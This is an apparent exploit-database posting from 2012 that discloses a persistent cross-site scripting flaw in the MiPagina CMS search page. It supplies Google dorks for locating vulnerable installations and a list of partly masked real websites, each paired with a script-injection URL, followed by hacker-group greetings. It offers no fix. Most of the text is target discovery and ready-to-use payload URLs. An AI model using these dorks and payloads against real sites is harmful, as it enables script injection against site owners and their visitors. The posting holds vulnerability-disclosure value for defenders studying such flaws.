==========================================================================
<<<:>>> MiPagina - Persistent XSS Vulnerability <<:>>>
==========================================================================
- Discovered By:
||| TheCyberNuxbie - Independent Security Research |||
<<< nuxbie@linuxhacktivist.com >>> CP: +62856-2538-963
[ www.linuxhacktivist.com ] $ YM: nux_exploit
- Info WebApps:
This CMS Develop By MiPagina:
http://www.mipagina.net/
- Google Dork:
inurl:"/validar_buscador_v2.php?buscar="
intext:"Con la tecnologa de: Mipagina.net"
- Exploit Concept:
http://lokalisasi/WebApps/validar_buscador_v2.php?buscar=[XSS]
- Sample Web Persistent XSS Vulnerability:
http://amxxc.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:>
http://curxxxria3bogota.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:>
http://pubxxxtural.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:>
http://partxxxpply.net/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:>
http://btsxxritysa.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:>
http://trasxxarserviciosltda.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:>
http://asxxi.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:>
http://fundxxionsanantonio.org/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:>
http://lacxxpana.co/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:>
http://ciwxxxt.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:>
http://cauxxxhoselcacique.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:>
http://talexxxum.coop/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:>
, And Many More @ Google...!!!
-:>>> Special Thanks <<<:-
...:::' 1337day Inj3ct0r TEAM ':::...
[ All Staff & 31337 Member Inj3ct0r TEAM ]
, And All Inj3ct0r Fans & All Hacktivist,,, :-)
#########################################################################
- Me @ Solo Raya, 20 April 2012 @ 21:32 PM.
[ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ]
#########################################################################